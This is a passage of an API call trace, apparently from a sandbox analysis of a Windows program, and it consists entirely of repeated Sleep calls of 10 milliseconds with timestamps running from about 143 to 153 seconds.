Sleep (dwMilliseconds=0xa) [0143.638] Sleep (dwMilliseconds=0xa) [0143.653] Sleep (dwMilliseconds=0xa) [0143.669] Sleep (dwMilliseconds=0xa) [0143.695] Sleep (dwMilliseconds=0xa) [0143.700] Sleep (dwMilliseconds=0xa) [0143.716] Sleep (dwMilliseconds=0xa) [0143.731] Sleep (dwMilliseconds=0xa) [0143.747] Sleep (dwMilliseconds=0xa) [0143.763] Sleep (dwMilliseconds=0xa) [0143.778] Sleep (dwMilliseconds=0xa) [0143.794] Sleep (dwMilliseconds=0xa) [0143.818] Sleep (dwMilliseconds=0xa) [0143.825] Sleep (dwMilliseconds=0xa) [0143.841] Sleep (dwMilliseconds=0xa) [0143.856] Sleep (dwMilliseconds=0xa) [0143.872] Sleep (dwMilliseconds=0xa) [0143.889] Sleep (dwMilliseconds=0xa) [0143.903] Sleep (dwMilliseconds=0xa) [0143.919] Sleep (dwMilliseconds=0xa) [0143.942] Sleep (dwMilliseconds=0xa) [0143.950] Sleep (dwMilliseconds=0xa) [0143.965] Sleep (dwMilliseconds=0xa) [0143.981] Sleep (dwMilliseconds=0xa) [0143.997] Sleep (dwMilliseconds=0xa) [0144.012] Sleep (dwMilliseconds=0xa) [0144.028] Sleep (dwMilliseconds=0xa) [0144.043] Sleep (dwMilliseconds=0xa) [0144.067] Sleep (dwMilliseconds=0xa) [0144.075] Sleep (dwMilliseconds=0xa) [0144.090] Sleep (dwMilliseconds=0xa) [0144.106] Sleep (dwMilliseconds=0xa) [0144.122] Sleep (dwMilliseconds=0xa) [0144.137] Sleep (dwMilliseconds=0xa) [0144.153] Sleep (dwMilliseconds=0xa) [0144.168] Sleep (dwMilliseconds=0xa) [0144.191] Sleep (dwMilliseconds=0xa) [0144.206] Sleep (dwMilliseconds=0xa) [0144.215] Sleep (dwMilliseconds=0xa) [0144.232] Sleep (dwMilliseconds=0xa) [0144.246] Sleep (dwMilliseconds=0xa) [0144.262] Sleep (dwMilliseconds=0xa) [0144.279] Sleep (dwMilliseconds=0xa) [0144.293] Sleep (dwMilliseconds=0xa) [0144.319] Sleep (dwMilliseconds=0xa) [0144.324] Sleep (dwMilliseconds=0xa) [0144.340] Sleep (dwMilliseconds=0xa) [0144.355] Sleep (dwMilliseconds=0xa) [0144.371] Sleep (dwMilliseconds=0xa) [0144.389] Sleep (dwMilliseconds=0xa) [0144.402] Sleep (dwMilliseconds=0xa) [0144.418] Sleep (dwMilliseconds=0xa) [0144.442] Sleep (dwMilliseconds=0xa) [0144.449] Sleep (dwMilliseconds=0xa) [0144.465] Sleep (dwMilliseconds=0xa) [0144.480] Sleep (dwMilliseconds=0xa) [0144.496] Sleep (dwMilliseconds=0xa) [0144.512] Sleep (dwMilliseconds=0xa) [0144.535] Sleep (dwMilliseconds=0xa) [0144.543] Sleep (dwMilliseconds=0xa) [0144.567] Sleep (dwMilliseconds=0xa) [0144.574] Sleep (dwMilliseconds=0xa) [0144.596] Sleep (dwMilliseconds=0xa) [0144.610] Sleep (dwMilliseconds=0xa) [0144.621] Sleep (dwMilliseconds=0xa) [0144.636] Sleep (dwMilliseconds=0xa) [0144.652] Sleep (dwMilliseconds=0xa) [0144.667] Sleep (dwMilliseconds=0xa) [0144.692] Sleep (dwMilliseconds=0xa) [0144.699] Sleep (dwMilliseconds=0xa) [0144.714] Sleep (dwMilliseconds=0xa) [0144.730] Sleep (dwMilliseconds=0xa) [0144.745] Sleep (dwMilliseconds=0xa) [0144.761] Sleep (dwMilliseconds=0xa) [0144.777] Sleep (dwMilliseconds=0xa) [0144.792] Sleep (dwMilliseconds=0xa) [0144.816] Sleep (dwMilliseconds=0xa) [0144.823] Sleep (dwMilliseconds=0xa) [0144.839] Sleep (dwMilliseconds=0xa) [0144.855] Sleep (dwMilliseconds=0xa) [0144.870] Sleep (dwMilliseconds=0xa) [0144.886] Sleep (dwMilliseconds=0xa) [0144.901] Sleep (dwMilliseconds=0xa) [0144.917] Sleep (dwMilliseconds=0xa) [0144.943] Sleep (dwMilliseconds=0xa) [0144.948] Sleep (dwMilliseconds=0xa) [0144.964] Sleep (dwMilliseconds=0xa) [0144.979] Sleep (dwMilliseconds=0xa) [0144.995] Sleep (dwMilliseconds=0xa) [0145.011] Sleep (dwMilliseconds=0xa) [0145.026] Sleep (dwMilliseconds=0xa) [0145.042] Sleep (dwMilliseconds=0xa) [0145.066] Sleep (dwMilliseconds=0xa) [0145.073] Sleep (dwMilliseconds=0xa) [0145.088] Sleep (dwMilliseconds=0xa) [0145.104] Sleep (dwMilliseconds=0xa) [0145.120] Sleep (dwMilliseconds=0xa) [0145.135] Sleep (dwMilliseconds=0xa) [0145.151] Sleep (dwMilliseconds=0xa) [0145.166] Sleep (dwMilliseconds=0xa) [0145.191] Sleep (dwMilliseconds=0xa) [0145.198] Sleep (dwMilliseconds=0xa) [0145.213] Sleep (dwMilliseconds=0xa) [0145.229] Sleep (dwMilliseconds=0xa) [0145.244] Sleep (dwMilliseconds=0xa) [0145.261] Sleep (dwMilliseconds=0xa) [0145.276] Sleep (dwMilliseconds=0xa) [0145.291] Sleep (dwMilliseconds=0xa) [0145.321] Sleep (dwMilliseconds=0xa) [0145.323] Sleep (dwMilliseconds=0xa) [0145.338] Sleep (dwMilliseconds=0xa) [0145.354] Sleep (dwMilliseconds=0xa) [0145.369] Sleep (dwMilliseconds=0xa) [0145.385] Sleep (dwMilliseconds=0xa) [0145.401] Sleep (dwMilliseconds=0xa) [0145.416] Sleep (dwMilliseconds=0xa) [0145.441] Sleep (dwMilliseconds=0xa) [0145.447] Sleep (dwMilliseconds=0xa) [0145.463] Sleep (dwMilliseconds=0xa) [0145.479] Sleep (dwMilliseconds=0xa) [0145.494] Sleep (dwMilliseconds=0xa) [0145.510] Sleep (dwMilliseconds=0xa) [0145.533] Sleep (dwMilliseconds=0xa) [0145.541] Sleep (dwMilliseconds=0xa) [0145.566] Sleep (dwMilliseconds=0xa) [0145.572] Sleep (dwMilliseconds=0xa) [0145.588] Sleep (dwMilliseconds=0xa) [0145.612] Sleep (dwMilliseconds=0xa) [0145.619] Sleep (dwMilliseconds=0xa) [0145.635] Sleep (dwMilliseconds=0xa) [0145.651] Sleep (dwMilliseconds=0xa) [0145.666] Sleep (dwMilliseconds=0xa) [0145.690] Sleep (dwMilliseconds=0xa) [0145.697] Sleep (dwMilliseconds=0xa) [0145.713] Sleep (dwMilliseconds=0xa) [0145.728] Sleep (dwMilliseconds=0xa) [0145.744] Sleep (dwMilliseconds=0xa) [0145.760] Sleep (dwMilliseconds=0xa) [0145.775] Sleep (dwMilliseconds=0xa) [0145.791] Sleep (dwMilliseconds=0xa) [0145.815] Sleep (dwMilliseconds=0xa) [0145.822] Sleep (dwMilliseconds=0xa) [0145.837] Sleep (dwMilliseconds=0xa) [0145.853] Sleep (dwMilliseconds=0xa) [0145.869] Sleep (dwMilliseconds=0xa) [0145.884] Sleep (dwMilliseconds=0xa) [0145.900] Sleep (dwMilliseconds=0xa) [0145.915] Sleep (dwMilliseconds=0xa) [0145.940] Sleep (dwMilliseconds=0xa) [0145.947] Sleep (dwMilliseconds=0xa) [0145.962] Sleep (dwMilliseconds=0xa) [0145.978] Sleep (dwMilliseconds=0xa) [0145.994] Sleep (dwMilliseconds=0xa) [0146.009] Sleep (dwMilliseconds=0xa) [0146.025] Sleep (dwMilliseconds=0xa) [0146.040] Sleep (dwMilliseconds=0xa) [0146.065] Sleep (dwMilliseconds=0xa) [0146.071] Sleep (dwMilliseconds=0xa) [0146.087] Sleep (dwMilliseconds=0xa) [0146.103] Sleep (dwMilliseconds=0xa) [0146.118] Sleep (dwMilliseconds=0xa) [0146.134] Sleep (dwMilliseconds=0xa) [0146.149] Sleep (dwMilliseconds=0xa) [0146.165] Sleep (dwMilliseconds=0xa) [0146.190] Sleep (dwMilliseconds=0xa) [0146.196] Sleep (dwMilliseconds=0xa) [0146.212] Sleep (dwMilliseconds=0xa) [0146.227] Sleep (dwMilliseconds=0xa) [0146.243] Sleep (dwMilliseconds=0xa) [0146.259] Sleep (dwMilliseconds=0xa) [0146.276] Sleep (dwMilliseconds=0xa) [0146.290] Sleep (dwMilliseconds=0xa) [0146.315] Sleep (dwMilliseconds=0xa) [0146.321] Sleep (dwMilliseconds=0xa) [0146.337] Sleep (dwMilliseconds=0xa) [0146.352] Sleep (dwMilliseconds=0xa) [0146.368] Sleep (dwMilliseconds=0xa) [0146.383] Sleep (dwMilliseconds=0xa) [0146.399] Sleep (dwMilliseconds=0xa) [0146.415] Sleep (dwMilliseconds=0xa) [0146.439] Sleep (dwMilliseconds=0xa) [0146.446] Sleep (dwMilliseconds=0xa) [0146.461] Sleep (dwMilliseconds=0xa) [0146.477] Sleep (dwMilliseconds=0xa) [0146.493] Sleep (dwMilliseconds=0xa) [0146.508] Sleep (dwMilliseconds=0xa) [0146.532] Sleep (dwMilliseconds=0xa) [0146.539] Sleep (dwMilliseconds=0xa) [0146.563] Sleep (dwMilliseconds=0xa) [0146.571] Sleep (dwMilliseconds=0xa) [0146.586] Sleep (dwMilliseconds=0xa) [0146.602] Sleep (dwMilliseconds=0xa) [0146.624] Sleep (dwMilliseconds=0xa) [0146.633] Sleep (dwMilliseconds=0xa) [0146.649] Sleep (dwMilliseconds=0xa) [0146.664] Sleep (dwMilliseconds=0xa) [0146.689] Sleep (dwMilliseconds=0xa) [0146.705] Sleep (dwMilliseconds=0xa) [0146.711] Sleep (dwMilliseconds=0xa) [0146.727] Sleep (dwMilliseconds=0xa) [0146.743] Sleep (dwMilliseconds=0xa) [0146.758] Sleep (dwMilliseconds=0xa) [0146.773] Sleep (dwMilliseconds=0xa) [0146.789] Sleep (dwMilliseconds=0xa) [0146.814] Sleep (dwMilliseconds=0xa) [0146.820] Sleep (dwMilliseconds=0xa) [0146.836] Sleep (dwMilliseconds=0xa) [0146.852] Sleep (dwMilliseconds=0xa) [0146.867] Sleep (dwMilliseconds=0xa) [0146.883] Sleep (dwMilliseconds=0xa) [0146.900] Sleep (dwMilliseconds=0xa) [0146.914] Sleep (dwMilliseconds=0xa) [0146.943] Sleep (dwMilliseconds=0xa) [0146.945] Sleep (dwMilliseconds=0xa) [0146.961] Sleep (dwMilliseconds=0xa) [0146.976] Sleep (dwMilliseconds=0xa) [0146.992] Sleep (dwMilliseconds=0xa) [0147.007] Sleep (dwMilliseconds=0xa) [0147.023] Sleep (dwMilliseconds=0xa) [0147.038] Sleep (dwMilliseconds=0xa) [0147.063] Sleep (dwMilliseconds=0xa) [0147.070] Sleep (dwMilliseconds=0xa) [0147.085] Sleep (dwMilliseconds=0xa) [0147.101] Sleep (dwMilliseconds=0xa) [0147.117] Sleep (dwMilliseconds=0xa) [0147.132] Sleep (dwMilliseconds=0xa) [0147.148] Sleep (dwMilliseconds=0xa) [0147.163] Sleep (dwMilliseconds=0xa) [0147.188] Sleep (dwMilliseconds=0xa) [0147.195] Sleep (dwMilliseconds=0xa) [0147.210] Sleep (dwMilliseconds=0xa) [0147.226] Sleep (dwMilliseconds=0xa) [0147.241] Sleep (dwMilliseconds=0xa) [0147.257] Sleep (dwMilliseconds=0xa) [0147.273] Sleep (dwMilliseconds=0xa) [0147.290] Sleep (dwMilliseconds=0xa) [0147.314] Sleep (dwMilliseconds=0xa) [0147.319] Sleep (dwMilliseconds=0xa) [0147.335] Sleep (dwMilliseconds=0xa) [0147.351] Sleep (dwMilliseconds=0xa) [0147.367] Sleep (dwMilliseconds=0xa) [0147.382] Sleep (dwMilliseconds=0xa) [0147.398] Sleep (dwMilliseconds=0xa) [0147.413] Sleep (dwMilliseconds=0xa) [0147.437] Sleep (dwMilliseconds=0xa) [0147.444] Sleep (dwMilliseconds=0xa) [0147.460] Sleep (dwMilliseconds=0xa) [0147.475] Sleep (dwMilliseconds=0xa) [0147.491] Sleep (dwMilliseconds=0xa) [0147.507] Sleep (dwMilliseconds=0xa) [0147.532] Sleep (dwMilliseconds=0xa) [0147.538] Sleep (dwMilliseconds=0xa) [0147.562] Sleep (dwMilliseconds=0xa) [0147.569] Sleep (dwMilliseconds=0xa) [0147.585] Sleep (dwMilliseconds=0xa) [0147.600] Sleep (dwMilliseconds=0xa) [0147.616] Sleep (dwMilliseconds=0xa) [0147.640] Sleep (dwMilliseconds=0xa) [0147.647] Sleep (dwMilliseconds=0xa) [0147.663] Sleep (dwMilliseconds=0xa) [0147.687] Sleep (dwMilliseconds=0xa) [0147.694] Sleep (dwMilliseconds=0xa) [0147.709] Sleep (dwMilliseconds=0xa) [0147.725] Sleep (dwMilliseconds=0xa) [0147.741] Sleep (dwMilliseconds=0xa) [0147.756] Sleep (dwMilliseconds=0xa) [0147.772] Sleep (dwMilliseconds=0xa) [0147.788] Sleep (dwMilliseconds=0xa) [0147.811] Sleep (dwMilliseconds=0xa) [0147.819] Sleep (dwMilliseconds=0xa) [0147.834] Sleep (dwMilliseconds=0xa) [0147.850] Sleep (dwMilliseconds=0xa) [0147.865] Sleep (dwMilliseconds=0xa) [0147.881] Sleep (dwMilliseconds=0xa) [0147.897] Sleep (dwMilliseconds=0xa) [0147.912] Sleep (dwMilliseconds=0xa) [0147.936] Sleep (dwMilliseconds=0xa) [0147.944] Sleep (dwMilliseconds=0xa) [0147.959] Sleep (dwMilliseconds=0xa) [0147.975] Sleep (dwMilliseconds=0xa) [0147.990] Sleep (dwMilliseconds=0xa) [0148.008] Sleep (dwMilliseconds=0xa) [0148.023] Sleep (dwMilliseconds=0xa) [0148.037] Sleep (dwMilliseconds=0xa) [0148.061] Sleep (dwMilliseconds=0xa) [0148.068] Sleep (dwMilliseconds=0xa) [0148.084] Sleep (dwMilliseconds=0xa) [0148.099] Sleep (dwMilliseconds=0xa) [0148.115] Sleep (dwMilliseconds=0xa) [0148.131] Sleep (dwMilliseconds=0xa) [0148.146] Sleep (dwMilliseconds=0xa) [0148.162] Sleep (dwMilliseconds=0xa) [0148.185] Sleep (dwMilliseconds=0xa) [0148.193] Sleep (dwMilliseconds=0xa) [0148.209] Sleep (dwMilliseconds=0xa) [0148.224] Sleep (dwMilliseconds=0xa) [0148.240] Sleep (dwMilliseconds=0xa) [0148.255] Sleep (dwMilliseconds=0xa) [0148.271] Sleep (dwMilliseconds=0xa) [0148.287] Sleep (dwMilliseconds=0xa) [0148.309] Sleep (dwMilliseconds=0xa) [0148.318] Sleep (dwMilliseconds=0xa) [0148.334] Sleep (dwMilliseconds=0xa) [0148.349] Sleep (dwMilliseconds=0xa) [0148.364] Sleep (dwMilliseconds=0xa) [0148.381] Sleep (dwMilliseconds=0xa) [0148.398] Sleep (dwMilliseconds=0xa) [0148.411] Sleep (dwMilliseconds=0xa) [0148.442] Sleep (dwMilliseconds=0xa) [0148.442] Sleep (dwMilliseconds=0xa) [0148.458] Sleep (dwMilliseconds=0xa) [0148.474] Sleep (dwMilliseconds=0xa) [0148.489] Sleep (dwMilliseconds=0xa) [0148.505] Sleep (dwMilliseconds=0xa) [0148.531] Sleep (dwMilliseconds=0xa) [0148.536] Sleep (dwMilliseconds=0xa) [0148.560] Sleep (dwMilliseconds=0xa) [0148.567] Sleep (dwMilliseconds=0xa) [0148.583] Sleep (dwMilliseconds=0xa) [0148.599] Sleep (dwMilliseconds=0xa) [0148.614] Sleep (dwMilliseconds=0xa) [0148.630] Sleep (dwMilliseconds=0xa) [0148.658] Sleep (dwMilliseconds=0xa) [0148.661] Sleep (dwMilliseconds=0xa) [0148.684] Sleep (dwMilliseconds=0xa) [0148.692] Sleep (dwMilliseconds=0xa) [0148.708] Sleep (dwMilliseconds=0xa) [0148.724] Sleep (dwMilliseconds=0xa) [0148.739] Sleep (dwMilliseconds=0xa) [0148.754] Sleep (dwMilliseconds=0xa) [0148.770] Sleep (dwMilliseconds=0xa) [0148.786] Sleep (dwMilliseconds=0xa) [0148.811] Sleep (dwMilliseconds=0xa) [0148.817] Sleep (dwMilliseconds=0xa) [0148.833] Sleep (dwMilliseconds=0xa) [0148.848] Sleep (dwMilliseconds=0xa) [0148.864] Sleep (dwMilliseconds=0xa) [0148.880] Sleep (dwMilliseconds=0xa) [0148.895] Sleep (dwMilliseconds=0xa) [0148.911] Sleep (dwMilliseconds=0xa) [0148.935] Sleep (dwMilliseconds=0xa) [0148.942] Sleep (dwMilliseconds=0xa) [0148.957] Sleep (dwMilliseconds=0xa) [0148.973] Sleep (dwMilliseconds=0xa) [0148.989] Sleep (dwMilliseconds=0xa) [0149.005] Sleep (dwMilliseconds=0xa) [0149.020] Sleep (dwMilliseconds=0xa) [0149.036] Sleep (dwMilliseconds=0xa) [0149.058] Sleep (dwMilliseconds=0xa) [0149.067] Sleep (dwMilliseconds=0xa) [0149.082] Sleep (dwMilliseconds=0xa) [0149.098] Sleep (dwMilliseconds=0xa) [0149.116] Sleep (dwMilliseconds=0xa) [0149.129] Sleep (dwMilliseconds=0xa) [0149.145] Sleep (dwMilliseconds=0xa) [0149.160] Sleep (dwMilliseconds=0xa) [0149.183] Sleep (dwMilliseconds=0xa) [0149.191] Sleep (dwMilliseconds=0xa) [0149.207] Sleep (dwMilliseconds=0xa) [0149.222] Sleep (dwMilliseconds=0xa) [0149.238] Sleep (dwMilliseconds=0xa) [0149.254] Sleep (dwMilliseconds=0xa) [0149.269] Sleep (dwMilliseconds=0xa) [0149.285] Sleep (dwMilliseconds=0xa) [0149.308] Sleep (dwMilliseconds=0xa) [0149.316] Sleep (dwMilliseconds=0xa) [0149.332] Sleep (dwMilliseconds=0xa) [0149.347] Sleep (dwMilliseconds=0xa) [0149.363] Sleep (dwMilliseconds=0xa) [0149.378] Sleep (dwMilliseconds=0xa) [0149.394] Sleep (dwMilliseconds=0xa) [0149.410] Sleep (dwMilliseconds=0xa) [0149.433] Sleep (dwMilliseconds=0xa) [0149.441] Sleep (dwMilliseconds=0xa) [0149.457] Sleep (dwMilliseconds=0xa) [0149.472] Sleep (dwMilliseconds=0xa) [0149.488] Sleep (dwMilliseconds=0xa) [0149.506] Sleep (dwMilliseconds=0xa) [0149.527] Sleep (dwMilliseconds=0xa) [0149.535] Sleep (dwMilliseconds=0xa) [0149.557] Sleep (dwMilliseconds=0xa) [0149.566] Sleep (dwMilliseconds=0xa) [0149.582] Sleep (dwMilliseconds=0xa) [0149.597] Sleep (dwMilliseconds=0xa) [0149.613] Sleep (dwMilliseconds=0xa) [0149.629] Sleep (dwMilliseconds=0xa) [0149.644] Sleep (dwMilliseconds=0xa) [0149.668] Sleep (dwMilliseconds=0xa) [0149.692] Sleep (dwMilliseconds=0xa) [0149.706] Sleep (dwMilliseconds=0xa) [0149.722] Sleep (dwMilliseconds=0xa) [0149.738] Sleep (dwMilliseconds=0xa) [0149.753] Sleep (dwMilliseconds=0xa) [0149.769] Sleep (dwMilliseconds=0xa) [0149.784] Sleep (dwMilliseconds=0xa) [0149.800] Sleep (dwMilliseconds=0xa) [0149.828] Sleep (dwMilliseconds=0xa) [0149.832] Sleep (dwMilliseconds=0xa) [0149.847] Sleep (dwMilliseconds=0xa) [0149.862] Sleep (dwMilliseconds=0xa) [0149.878] Sleep (dwMilliseconds=0xa) [0149.893] Sleep (dwMilliseconds=0xa) [0149.910] Sleep (dwMilliseconds=0xa) [0149.925] Sleep (dwMilliseconds=0xa) [0149.949] Sleep (dwMilliseconds=0xa) [0149.956] Sleep (dwMilliseconds=0xa) [0149.971] Sleep (dwMilliseconds=0xa) [0149.987] Sleep (dwMilliseconds=0xa) [0150.002] Sleep (dwMilliseconds=0xa) [0150.018] Sleep (dwMilliseconds=0xa) [0150.034] Sleep (dwMilliseconds=0xa) [0150.049] Sleep (dwMilliseconds=0xa) [0150.072] Sleep (dwMilliseconds=0xa) [0150.081] Sleep (dwMilliseconds=0xa) [0150.096] Sleep (dwMilliseconds=0xa) [0150.112] Sleep (dwMilliseconds=0xa) [0150.128] Sleep (dwMilliseconds=0xa) [0150.143] Sleep (dwMilliseconds=0xa) [0150.159] Sleep (dwMilliseconds=0xa) [0150.174] Sleep (dwMilliseconds=0xa) [0150.197] Sleep (dwMilliseconds=0xa) [0150.205] Sleep (dwMilliseconds=0xa) [0150.223] Sleep (dwMilliseconds=0xa) [0150.237] Sleep (dwMilliseconds=0xa) [0150.252] Sleep (dwMilliseconds=0xa) [0150.268] Sleep (dwMilliseconds=0xa) [0150.283] Sleep (dwMilliseconds=0xa) [0150.299] Sleep (dwMilliseconds=0xa) [0150.322] Sleep (dwMilliseconds=0xa) [0150.330] Sleep (dwMilliseconds=0xa) [0150.346] Sleep (dwMilliseconds=0xa) [0150.361] Sleep (dwMilliseconds=0xa) [0150.377] Sleep (dwMilliseconds=0xa) [0150.393] Sleep (dwMilliseconds=0xa) [0150.408] Sleep (dwMilliseconds=0xa) [0150.424] Sleep (dwMilliseconds=0xa) [0150.447] Sleep (dwMilliseconds=0xa) [0150.455] Sleep (dwMilliseconds=0xa) [0150.470] Sleep (dwMilliseconds=0xa) [0150.486] Sleep (dwMilliseconds=0xa) [0150.502] Sleep (dwMilliseconds=0xa) [0150.517] Sleep (dwMilliseconds=0xa) [0150.543] Sleep (dwMilliseconds=0xa) [0150.548] Sleep (dwMilliseconds=0xa) [0150.572] Sleep (dwMilliseconds=0xa) [0150.580] Sleep (dwMilliseconds=0xa) [0150.596] Sleep (dwMilliseconds=0xa) [0150.613] Sleep (dwMilliseconds=0xa) [0150.627] Sleep (dwMilliseconds=0xa) [0150.642] Sleep (dwMilliseconds=0xa) [0150.658] Sleep (dwMilliseconds=0xa) [0150.683] Sleep (dwMilliseconds=0xa) [0150.707] Sleep (dwMilliseconds=0xa) [0150.720] Sleep (dwMilliseconds=0xa) [0150.736] Sleep (dwMilliseconds=0xa) [0150.751] Sleep (dwMilliseconds=0xa) [0150.767] Sleep (dwMilliseconds=0xa) [0150.783] Sleep (dwMilliseconds=0xa) [0150.798] Sleep (dwMilliseconds=0xa) [0150.814] Sleep (dwMilliseconds=0xa) [0150.837] Sleep (dwMilliseconds=0xa) [0150.845] Sleep (dwMilliseconds=0xa) [0150.861] Sleep (dwMilliseconds=0xa) [0150.876] Sleep (dwMilliseconds=0xa) [0150.892] Sleep (dwMilliseconds=0xa) [0150.907] Sleep (dwMilliseconds=0xa) [0150.924] Sleep (dwMilliseconds=0xa) [0150.939] Sleep (dwMilliseconds=0xa) [0150.962] Sleep (dwMilliseconds=0xa) [0150.970] Sleep (dwMilliseconds=0xa) [0150.985] Sleep (dwMilliseconds=0xa) [0151.001] Sleep (dwMilliseconds=0xa) [0151.017] Sleep (dwMilliseconds=0xa) [0151.032] Sleep (dwMilliseconds=0xa) [0151.048] Sleep (dwMilliseconds=0xa) [0151.063] Sleep (dwMilliseconds=0xa) [0151.086] Sleep (dwMilliseconds=0xa) [0151.095] Sleep (dwMilliseconds=0xa) [0151.110] Sleep (dwMilliseconds=0xa) [0151.126] Sleep (dwMilliseconds=0xa) [0151.141] Sleep (dwMilliseconds=0xa) [0151.157] Sleep (dwMilliseconds=0xa) [0151.173] Sleep (dwMilliseconds=0xa) [0151.188] Sleep (dwMilliseconds=0xa) [0151.211] Sleep (dwMilliseconds=0xa) [0151.220] Sleep (dwMilliseconds=0xa) [0151.235] Sleep (dwMilliseconds=0xa) [0151.251] Sleep (dwMilliseconds=0xa) [0151.266] Sleep (dwMilliseconds=0xa) [0151.282] Sleep (dwMilliseconds=0xa) [0151.297] Sleep (dwMilliseconds=0xa) [0151.313] Sleep (dwMilliseconds=0xa) [0151.336] Sleep (dwMilliseconds=0xa) [0151.344] Sleep (dwMilliseconds=0xa) [0151.360] Sleep (dwMilliseconds=0xa) [0151.375] Sleep (dwMilliseconds=0xa) [0151.391] Sleep (dwMilliseconds=0xa) [0151.407] Sleep (dwMilliseconds=0xa) [0151.422] Sleep (dwMilliseconds=0xa) [0151.439] Sleep (dwMilliseconds=0xa) [0151.463] Sleep (dwMilliseconds=0xa) [0151.469] Sleep (dwMilliseconds=0xa) [0151.485] Sleep (dwMilliseconds=0xa) [0151.500] Sleep (dwMilliseconds=0xa) [0151.516] Sleep (dwMilliseconds=0xa) [0151.545] Sleep (dwMilliseconds=0xa) [0151.547] Sleep (dwMilliseconds=0xa) [0151.563] Sleep (dwMilliseconds=0xa) [0151.586] Sleep (dwMilliseconds=0xa) [0151.594] Sleep (dwMilliseconds=0xa) [0151.609] Sleep (dwMilliseconds=0xa) [0151.625] Sleep (dwMilliseconds=0xa) [0151.641] Sleep (dwMilliseconds=0xa) [0151.657] Sleep (dwMilliseconds=0xa) [0151.672] Sleep (dwMilliseconds=0xa) [0151.696] Sleep (dwMilliseconds=0xa) [0151.720] Sleep (dwMilliseconds=0xa) [0151.734] Sleep (dwMilliseconds=0xa) [0151.750] Sleep (dwMilliseconds=0xa) [0151.766] Sleep (dwMilliseconds=0xa) [0151.781] Sleep (dwMilliseconds=0xa) [0151.796] Sleep (dwMilliseconds=0xa) [0151.812] Sleep (dwMilliseconds=0xa) [0151.828] Sleep (dwMilliseconds=0xa) [0151.852] Sleep (dwMilliseconds=0xa) [0151.859] Sleep (dwMilliseconds=0xa) [0151.875] Sleep (dwMilliseconds=0xa) [0151.891] Sleep (dwMilliseconds=0xa) [0151.906] Sleep (dwMilliseconds=0xa) [0151.922] Sleep (dwMilliseconds=0xa) [0151.937] Sleep (dwMilliseconds=0xa) [0151.953] Sleep (dwMilliseconds=0xa) [0151.976] Sleep (dwMilliseconds=0xa) [0151.984] Sleep (dwMilliseconds=0xa) [0152.000] Sleep (dwMilliseconds=0xa) [0152.015] Sleep (dwMilliseconds=0xa) [0152.031] Sleep (dwMilliseconds=0xa) [0152.047] Sleep (dwMilliseconds=0xa) [0152.062] Sleep (dwMilliseconds=0xa) [0152.077] Sleep (dwMilliseconds=0xa) [0152.101] Sleep (dwMilliseconds=0xa) [0152.109] Sleep (dwMilliseconds=0xa) [0152.124] Sleep (dwMilliseconds=0xa) [0152.140] Sleep (dwMilliseconds=0xa) [0152.155] Sleep (dwMilliseconds=0xa) [0152.171] Sleep (dwMilliseconds=0xa) [0152.187] Sleep (dwMilliseconds=0xa) [0152.203] Sleep (dwMilliseconds=0xa) [0152.226] Sleep (dwMilliseconds=0xa) [0152.233] Sleep (dwMilliseconds=0xa) [0152.249] Sleep (dwMilliseconds=0xa) [0152.265] Sleep (dwMilliseconds=0xa) [0152.280] Sleep (dwMilliseconds=0xa) [0152.296] Sleep (dwMilliseconds=0xa) [0152.312] Sleep (dwMilliseconds=0xa) [0152.327] Sleep (dwMilliseconds=0xa) [0152.350] Sleep (dwMilliseconds=0xa) [0152.358] Sleep (dwMilliseconds=0xa) [0152.374] Sleep (dwMilliseconds=0xa) [0152.389] Sleep (dwMilliseconds=0xa) [0152.405] Sleep (dwMilliseconds=0xa) [0152.421] Sleep (dwMilliseconds=0xa) [0152.437] Sleep (dwMilliseconds=0xa) [0152.452] Sleep (dwMilliseconds=0xa) [0152.481] Sleep (dwMilliseconds=0xa) [0152.483] Sleep (dwMilliseconds=0xa) [0152.499] Sleep (dwMilliseconds=0xa) [0152.514] Sleep (dwMilliseconds=0xa) [0152.543] Sleep (dwMilliseconds=0xa) [0152.545] Sleep (dwMilliseconds=0xa) [0152.561] Sleep (dwMilliseconds=0xa) [0152.577] Sleep (dwMilliseconds=0xa) [0152.601] Sleep (dwMilliseconds=0xa) [0152.608] Sleep (dwMilliseconds=0xa) [0152.623] Sleep (dwMilliseconds=0xa) [0152.639] Sleep (dwMilliseconds=0xa) [0152.655] Sleep (dwMilliseconds=0xa) [0152.670] Sleep (dwMilliseconds=0xa) [0152.686] Sleep (dwMilliseconds=0xa) [0152.714] Sleep (dwMilliseconds=0xa) [0152.744] Sleep (dwMilliseconds=0xa) [0152.748] Sleep (dwMilliseconds=0xa) [0152.764] Sleep (dwMilliseconds=0xa) [0152.779] Sleep (dwMilliseconds=0xa) [0152.795] Sleep (dwMilliseconds=0xa) [0152.811] Sleep (dwMilliseconds=0xa) [0152.827] Sleep (dwMilliseconds=0xa) [0152.842] Sleep (dwMilliseconds=0xa) [0152.872] Sleep (dwMilliseconds=0xa) [0152.873] Sleep (dwMilliseconds=0xa) [0152.889] Sleep (dwMilliseconds=0xa) [0152.904] Sleep (dwMilliseconds=0xa) [0152.920] Sleep (dwMilliseconds=0xa) [0152.935] Sleep (dwMilliseconds=0xa) [0152.951] Sleep (dwMilliseconds=0xa) [0152.967] Sleep (dwMilliseconds=0xa) [0152.997] Sleep (dwMilliseconds=0xa) [0152.998] Sleep (dwMilliseconds=0xa) [0153.013] Sleep (dwMilliseconds=0xa) [0153.029] Sleep (dwMilliseconds=0xa) [0153.044] Sleep (dwMilliseconds=0xa) [0153.060] Sleep (dwMilliseconds=0xa) [0153.076] Sleep (dwMilliseconds=0xa) [0153.091] Sleep (dwMilliseconds=0xa) [0153.115] Sleep (dwMilliseconds=0xa) [0153.123] Sleep (dwMilliseconds=0xa) [0153.138] Sleep (dwMilliseconds=0xa) [0153.155] Sleep (dwMilliseconds=0xa) [0153.173] Sleep (dwMilliseconds=0xa) [0153.185] Sleep (dwMilliseconds=0xa) [0153.201] Sleep (dwMilliseconds=0xa) [0153.216] Sleep (dwMilliseconds=0xa) [0153.239] Sleep (dwMilliseconds=0xa) [0153.247] Sleep (dwMilliseconds=0xa) [0153.263] Sleep (dwMilliseconds=0xa) [0153.279] Sleep (dwMilliseconds=0xa) [0153.294] Sleep (dwMilliseconds=0xa) [0153.310] Sleep (dwMilliseconds=0xa) [0153.325] Sleep (dwMilliseconds=0xa) [0153.341] Sleep (dwMilliseconds=0xa) [0153.364] Sleep (dwMilliseconds=0xa) [0153.372] Sleep (dwMilliseconds=0xa) [0153.388] Sleep (dwMilliseconds=0xa) [0153.404] Sleep (dwMilliseconds=0xa) [0153.419] Sleep (dwMilliseconds=0xa) 